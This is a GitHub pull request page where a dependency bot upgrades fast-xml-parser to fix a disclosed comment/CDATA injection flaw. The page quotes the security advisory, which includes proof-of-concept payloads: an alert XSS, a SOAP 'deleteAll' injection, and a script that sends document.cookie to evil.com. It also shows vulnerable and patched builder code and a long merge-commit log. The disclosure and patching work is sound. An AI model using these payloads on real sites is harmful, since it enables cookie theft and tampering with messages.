
Update dependency fast-xml-parser to v5.7.0 [SECURITY]#16452

Merged
ematipico merged 1 commit into
mainfrom
renovate/npm-fast-xml-parser-vulnerability
May 1, 2026

Conversation


@renovate renovate Bot commented Apr 23, 2026

This PR contains the following updates:

Package           Change           Age      Confidence
fast-xml-parser   5.5.7 → 5.7.0    (badge)  (badge)

fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters

CVE-2026-41650 / GHSA-gh4j-gqv2-49f6

More information

Details

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters
Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept
Test 1: Comment Injection (XSS in SVG/HTML context)
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>

Test 3: SOAP Message Injection
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true
Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

  1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
  2. SOAP injection: Modify SOAP message structure by injecting XML elements
  3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
  4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#45;&#45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}
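The summary above describes the missing escaping and the Suggested Fix shows the two replacements. The following is an added example, not code from fast-xml-parser or the advisory: it puts the unsafe template beside the fixed one and adds strict readers that reject any text outside comment/CDATA context, so a test can show which builder keeps untrusted input inside its delimiters. The sample values and the names buildCdata, buildComment, readCdataRun, readComment and staysInContext are constructed for this example.

```javascript
// Vulnerable shape from the advisory: the value's own "]]>" or "-->" closes
// the context early.
function buildCdataUnsafe(val) {
  return `<![CDATA[${val}]]>`;
}
function buildCommentUnsafe(val) {
  return `<!--${val}-->`;
}

// Hardened CDATA: split every "]]>" across two sections. The terminator never
// appears inside a section, and a parser concatenates sections losslessly.
function buildCdata(val) {
  const safe = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
  return `<![CDATA[${safe}]]>`;
}

// Hardened comment: XML 1.0 forbids "--" in a comment body and a trailing "-",
// so this cannot be lossless. A numeric character reference is not expanded
// inside comments, but it is no longer the "--" token a parser looks for.
function buildComment(val) {
  const safe = String(val).replace(/--/g, '&#45;&#45;').replace(/-$/, '&#45;');
  return `<!--${safe}-->`;
}

// Strict reader: accepts only a run of CDATA sections with nothing between
// them and returns their concatenated text; anything else is a breakout.
function readCdataRun(xml) {
  let out = '';
  let pos = 0;
  while (pos < xml.length) {
    if (!xml.startsWith('<![CDATA[', pos)) {
      throw new Error(`content outside CDATA at offset ${pos}`);
    }
    const end = xml.indexOf(']]>', pos + 9);
    if (end === -1) throw new Error('unterminated CDATA section');
    out += xml.slice(pos + 9, end);
    pos = end + 3;
  }
  return out;
}

// Strict reader for one comment: a single "<!--" ... "-->" whose body a
// conforming parser accepts (no "--", no trailing "-").
function readComment(xml) {
  if (!xml.startsWith('<!--') || !xml.endsWith('-->')) {
    throw new Error('not a single comment');
  }
  const body = xml.slice(4, -3);
  if (body.includes('--') || body.endsWith('-')) {
    throw new Error('comment body contains "--" or a trailing "-"');
  }
  return body;
}

// true when `builder` keeps `val` inside its context, false on a breakout.
function staysInContext(builder, reader, val) {
  try { reader(builder(val)); return true; } catch { return false; }
}

// Constructed samples shaped like the advisory's payloads, without the script.
const CDATA_SAMPLE = 'Content]]><injected/><![CDATA[more';
const COMMENT_SAMPLE = 'note --><injected/><!--';

console.log('unsafe cdata:', staysInContext(buildCdataUnsafe, readCdataRun, CDATA_SAMPLE)); // false
console.log('fixed cdata:', staysInContext(buildCdata, readCdataRun, CDATA_SAMPLE)); // true
console.log('unsafe comment:', staysInContext(buildCommentUnsafe, readComment, COMMENT_SAMPLE)); // false
console.log('fixed comment:', staysInContext(buildComment, readComment, COMMENT_SAMPLE)); // true
```

The CDATA split round-trips exactly through readCdataRun; the comment fix does not, which is why the library cannot make comment content lossless and why untrusted data is better kept out of comments altogether.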

Severity

  • CVSS Score: 6.1 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

v5.6.0

v5.5.12

v5.5.11

v5.5.10: performance improvement, increase entity expansion default limit

  • increase default entity expansion limit as many projects demand it
    maxEntitySize: 10000,
    maxExpansionDepth: 10000,
    maxTotalExpansions: Infinity,
    maxExpandedLength: 100000,
    maxEntityCount: 1000,
  • performance improvement
    • reduce calls to toString
    • early return when entities are not present
    • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

v5.5.9: fix typings and matcher instance in callbacks

combine typings file to avoid configuration changes
pass readonly instance of matcher to the callbacks to avoid accidental push/pop call

v5.5.8


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Apr 23, 2026

changeset-bot Bot commented Apr 23, 2026

⚠️ No Changeset found

Latest commit: 73f9080

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5.7.0 [security] chore(deps): update dependency fast-xml-parser to v5.7.0 [security] - autoclosed Apr 23, 2026
@renovate renovate Bot closed this Apr 23, 2026
@renovate renovate Bot deleted the renovate/npm-fast-xml-parser-vulnerability branch April 23, 2026 16:47
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5.7.0 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Apr 23, 2026
@renovate renovate Bot reopened this Apr 23, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from c048d10 to ab1b5a3 Compare April 23, 2026 16:57
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Update dependency fast-xml-parser to v5.7.0 [SECURITY] Apr 24, 2026
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] Update dependency fast-xml-parser to v5.7.0 [SECURITY] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] - autoclosed Update dependency fast-xml-parser to v5.7.0 [SECURITY] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from ab1b5a3 to 7b005ac Compare April 27, 2026 15:17
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] Update dependency fast-xml-parser to v5.7.0 [SECURITY] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] - autoclosed Update dependency fast-xml-parser to v5.7.0 [SECURITY] Apr 28, 2026
@renovate renovate Bot reopened this Apr 28, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 3 times, most recently from 1daa68c to 096ceba Compare April 29, 2026 10:27
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Apr 29, 2026

github-actions Bot commented Apr 29, 2026

📊 Dependency Size Changes

Warning

This PR adds 252.6 kB of new dependencies, which exceeds the threshold of 100 kB.

📦 Package 📏 Size
fast-xml-parser@5.5.7 → fast-xml-parser@5.7.0 153.6 kB
@nodable/entities@2.1.0 60.3 kB
path-expression-matcher@1.1.3 → path-expression-matcher@1.5.0 50.7 kB
strnum@2.2.1 → strnum@2.2.3 -12.6 kB
fast-xml-builder@1.1.4 → fast-xml-builder@1.1.5 685 B

Total size change: 252.6 kB

@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Update dependency fast-xml-parser to v5.7.0 [SECURITY] Apr 29, 2026
@renovate renovate Bot changed the title Update dependency fast-xml-parser to v5.7.0 [SECURITY] chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Apr 29, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5.7.0 [security] Update dependency fast-xml-parser to v5.7.0 [SECURITY] Apr 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 096ceba to 73f9080 Compare May 1, 2026 10:42
@ematipico ematipico merged commit b4791e3 into main May 1, 2026
23 checks passed
matthewp added a commit that referenced this pull request May 5, 2026
* Fix merge-fix workflow to handle conflict markers before install (#16539)

* Handle merge conflicts in merge-fix workflow by stripping JSON/YAML markers and verifying via AI (#16541)

* [ci] format

* fix(render): avoid script dedup state consumption in inert template c… (#16527)

* fix(render): avoid script dedup state consumption in inert template contexts #16525

* fix(render): normalize inert script dedup test outputs to strings

* fix: add missing hydration metadata fields in inert-script-dedup tests

* test(app): add component-level inert template script dedup coverage

* test(app): stabilize inert script dedup regression coverage

* fix(astro): move inert template dedup logic into hydration/directive script guards

* [ci] format

* fix: emit fallback rewrite pages (#16515)

* fix(i18n): emit fallback rewrite pages

* chore: add changeset

* [ci] format

* refactor(astro): replace tsconfck with get-tsconfig (#16433)

* fix(language-server): remove circular dependency on svelte/vue integrations (#16532)

* [ci] format

* fix(upgrade): use bundled JS output (#16547)

* Update dependency postcss to v8.5.10 [SECURITY] (#16489)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

* Update dependency fastify to v5.8.5 [SECURITY] (#16346)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

* Update dependency fast-xml-parser to v5.7.0 [SECURITY] (#16452)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

* fix(cloudflare): preserve existing KV namespace bindings when injecting SESSION (#16555)

* fix(slots): unwrap conditional slot callbacks (#16509)

Co-authored-by: cyphercodes <cyphercodes@users.noreply.github.com>

* fix: preserve CSS propagation for partial pages imported as components (#16415)

* fix(astro): preserve CSS from imported partial pages

Treat top-level pages as CSS boundaries only when they are referenced exclusively by the virtual page module, so partial pages imported as components continue propagating transitive styles in production builds.

Made-with: Cursor

* test(astro): fix partial CSS fixture component import path

Correct the regression fixture path so the partial page can resolve ResultsTable during build on CI.

Made-with: Cursor

* test(astro): make partial css assertion robust to minification

Assert that scoped ResultsTable selectors are present in extracted styles instead of matching a specific color token that can be minified differently across environments.

Made-with: Cursor

* chore: rerun CI after unrelated e2e flake

Trigger a fresh workflow run for PR #16415 after unrelated flaky E2E failures in actions-blog/cloudflare/hmr tests.

Made-with: Cursor

* fix: propagate head metadata across ssr and prerender envs in dev (#16292)

* fix: propagate head metadata across ssr and prerender envs in dev

Signed-off-by: Patrick Linnane <patrick@linnane.io>

* test(astro): cover head propagation through prerender env

Signed-off-by: Patrick Linnane <patrick@linnane.io>

---------

Signed-off-by: Patrick Linnane <patrick@linnane.io>

* fix(assets): pass through images Sharp cannot decode instead of crashing (#16451)

* fix(assets): pass through images Sharp cannot decode instead of crashing

* test(assets): add test for animated AVIF pass-through

* test(assets): add test for animated AVIF pass-through

* fix(test): remove incorrect avif extension assertion

* chore: add changeset for animated AVIF fix

* feat(assets): add warning when Sharp cannot optimize unsupported image formats

* chore: lint and whitespace

* [ci] format

* Update dependency @fastify/middie to v9.3.2 [SECURITY] (#16369)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

* perf(astro): skip session storage lookup if no cookie is set (#16540)

* Fix defineLiveCollection interface loader typing (#16018)

* Fix defineLiveCollection interface loader typing

* Retrigger CI

* Retrigger CI

* [ci] format

* Fix style compilation failure when importing components via tsconfig path aliases (#15994)

* fix: resolve relative virtual module IDs in normalizeFilename for path alias styles

When a component with a <style> tag is imported via a TypeScript path
alias, certain environments (Windows + newer Node.js) can produce a
relative virtual module ID (e.g. ./src/components/Foo.astro?astro&type=style).
The load handler passed this through normalizeFilename to look up the
compile metadata cache, but the function had no branch for ./-prefixed
relative paths, so it returned the path unchanged instead of resolving
it to an absolute path. This caused a cache miss and a build error.

Adds a branch to resolve relative paths against root, matching the
behavior used for /@fs and /path variants.

Fixes #15963

* test: assert against emitted CSS file for path alias style regression test

* fix(cloudflare): fix static assets and prerendered pages 404ing when `base` is configured. (#16277)

* fix(cloudflare): static assets being in the wrong place

* test(cloudflare): add tests

* add changeset

---------

Co-authored-by: Matthew Phillips <matthew@matthewphillips.info>

* [ci] format

* fix(test): update test-utils import from .js to .ts in .test.js files (#16560)

* fix(frontmatter): preserve strings and comments when replacing top-le… (#16552)

* fix(frontmatter): preserve strings and comments when replacing top-level return (#16551)

* chore: add changeset for cloudflare KV namespace fix

* fix(cloudflare): re-apply KV namespace merge fix after source revert

---------

Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>

* fix: processing procedure for dynamic paths (#16144)

* feat: test matching dynamic routes contain .html in their params

* fix: processing procedure for dynamic paths

* feat: changeset file for processing procedure for dynamic paths

* refactor(routing): move .html stripping logic from getParams to getProps

* fix: UT of getParams function by fixing path mismatch error returning html file

* fix: logic of removing .html extension

* Apply suggestion from @Fryuni

Co-authored-by: Luiz Ferraz <luiz@lferraz.com>

* Apply suggestion from @Fryuni

Co-authored-by: Luiz Ferraz <luiz@lferraz.com>

* Apply suggestion from @Fryuni

Co-authored-by: Luiz Ferraz <luiz@lferraz.com>

---------

Co-authored-by: Matthew Phillips <matthew@matthewphillips.info>
Co-authored-by: Luiz Ferraz <luiz@lferraz.com>
Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>

* fix(css): preserve scope on nested & with lightningcss transformer (#16548)

* fix(css): preserve scope on nested & with lightningcss transformer

with `vite.css.transformer: 'lightningcss'`, scoped styles using
`:where(& > ...)` (the shape tailwind v4's `space-x-*`, `space-y-*`,
and `divide-*` expand to) put the scope attribute on the matched
child instead of the parent. lightningcss flattened the nesting
before `@astrojs/compiler` ran scope injection, so by then
`:where(...)` was the leading compound and the injector prepended
`[data-astro-cid-X]` as a new leading compound — constraining the
wrong element.

ask lightningcss to skip nesting lowering during the per-component
`preprocessCSS` call (via `Features.Nesting` on a shallow-cloned
config — non-mutating, safe under parallel compiles). vite's final
pipeline still lowers nesting for the bundle. adds a regression test
covering the reporter's exact shape.

Fixes #16524

* docs(changeset): rewrite per astro guidelines

---------

Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>

* Fixes @_@ not being stripped from CSS file names (#16264)

Co-authored-by: Matthew Phillips <matthew@matthewphillips.info>
Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>

* fix : astro image position prop bug (#16236)

* feat: test of astro image position prop bug

* fix: logic of getItem function

* feat: changeset file

* fix: create data-astro-image-pos attribute all time for path csp unit test

* feat: another test of getImage function

* fix: changeset explanation more clearly for users

* Add: yaml file

* chore: clean up changeset

---------

Co-authored-by: Matthew Phillips <matthew@matthewphillips.info>
Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>

* [ci] format

* fix(build): exclude prerendered route styles from SSR manifest (#16517)

Inline CSS for prerendered routes is dead weight in the SSR manifest:
the prerendered HTML on disk already contains the <style> tags, and
the SSR worker never renders these routes. Strip styles for prerendered
routes from the SSR manifest while leaving the prerender manifest (and
prerendered HTML) unchanged. Cuts SSR entry-chunk size on hybrid builds
with build.inlineStylesheets: "always", reducing cold-start parse cost
on Cloudflare Workers and similar platforms.

* fix(prefetch): trigger tap strategy when clicking nested child elements (#16566)

* fix(prefetch): trigger tap strategy when clicking nested child elements

* fix(prefetch): trigger tap and hover strategies when clicking nested child elements

* fix(astro): persist session delete without prior get/set (#16565)

* fix(astro): persist session delete without prior get/set

* test(e2e): sync collectLoads to avoid race with assertions

* fix(astro): persist session delete without prior get/set

* fix: route mismatch using trail slash never (#16516)

* feat: test for route match fails when trailingSlash never

* fix: root route matching with trailingSlash: 'never' and base path

* feat: changeset file

* fix: root route matching with trailingSlash 'never' and base path in dev server and rewrites

The `normalizeRewritePathname` in rewrite.ts was returning '' (empty string)
for root-path rewrites with a non-root base, and app.ts was converting the
stripped pathname '/' to '' before route matching. Both relied on the old
'^$' pattern for the index route. After the pattern.ts fix made the root
pattern '^/$', these normalizations broke matching.

Remove the '/' -> '' conversions so route.pattern.test('/') correctly matches
the fixed '^/$' pattern in both direct requests and Astro.rewrite() calls

* fix: add regression test for root path normalization with base

---------

* [ci] format

* [ci] release (#16545)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>

* fix: resolve merge conflicts from main into next

* fix: resolve merge issues from main into next

- Add missing dependencies (get-tsconfig, jsonc-parser) and remove tsconfck
  (replaced on main by PR #16433 but deps were lost during merge)
- Remove unused replaceTopLevelReturns export from vite-plugin-astro/utils.ts
  (function from main's PR #16552 not used by next's Rust compiler, fixes knip lint)
- Update lightningcss-scoped-nesting test expectations for Rust compiler
  (next branch handles CSS scoping differently, test from PR #16548)
- Format compile.ts (remove extra blank line)

* chore: trigger CI

* fix: add head-inject directive to propagated assets module for CSS injection

* chore: update main-to-next merge

* chore: retrigger CI

* chore: retrigger CI

---------

Signed-off-by: Patrick Linnane <patrick@linnane.io>
Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com>
Co-authored-by: Matthew Phillips <matthewp@users.noreply.github.com>
Co-authored-by: Chan <101856681+enjoyandlove@users.noreply.github.com>
Co-authored-by: knj <kenji.tomita1996@gmail.com>
Co-authored-by: knj <ematipico@users.noreply.github.com>
Co-authored-by: ocavue <ocavue@users.noreply.github.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: web-dev0521 <jasonpette1783@gmail.com>
Co-authored-by: Rayan Salhab <r.salhab@aiyexpertsolutions.com>
Co-authored-by: cyphercodes <cyphercodes@users.noreply.github.com>
Co-authored-by: 0x K. <66915025+0xbejaxer@users.noreply.github.com>
Co-authored-by: Patrick Linnane <patrick@linnane.io>
Co-authored-by: Maxim Slobodchikov <93232189+maximslo@users.noreply.github.com>
Co-authored-by: Matt Kane <m@mk.gg>
Co-authored-by: Felmon <felmonon@gmail.com>
Co-authored-by: Ossaid <imossaidquadri@gmail.com>
Co-authored-by: Calvin Liang <me@calvin.sh>
Co-authored-by: Matthew Phillips <matthew@matthewphillips.info>
Co-authored-by: fkatsuhiro <113022468+fkatsuhiro@users.noreply.github.com>
Co-authored-by: Luiz Ferraz <luiz@lferraz.com>
Co-authored-by: Utpal Sen <utpalsen902@gmail.com>
Co-authored-by: atsbob <98831687+atsbob@users.noreply.github.com>
Co-authored-by: Adam Chalemian <adam@chal.net>
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>

Labels

dependencies Pull requests that update a dependency file

1 participant